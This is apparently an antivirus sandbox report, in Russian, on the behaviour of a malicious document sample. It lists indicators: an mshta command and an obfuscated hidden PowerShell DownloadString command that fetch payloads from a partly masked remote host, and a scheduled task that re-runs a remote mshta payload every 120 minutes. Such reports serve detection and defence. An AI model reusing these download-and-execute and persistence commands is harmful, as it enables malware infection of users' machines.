Техническая информация
- <SYSTEM32>\tasks\cdtcomecu
- '<SYSTEM32>\taskkill.exe' /f /im WINWORD.EXE
- '<SYSTEM32>\mshta.exe' "http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/0.mp3"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/1.txt...
- %TEMP%\dat5ffa.tmp
- %TEMP%\dat5ffa.tmp
- 'dr########3.hospedagemdesites.ws':80
- http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/0.mp3
- DNS ASK dr########3.hospedagemdesites.ws
- ClassName: '' WindowName: 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'
- ClassName: '' WindowName: ''
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 120 /tn "CDTcomeCU" /tr "\"<SYSTEM32>\mshta.exe\"http://ho###nuve.com/erro.crt" /F
- '<SYSTEM32>\cmd.exe' /C taskkill /f /im WINWORD.EXE & exit" /F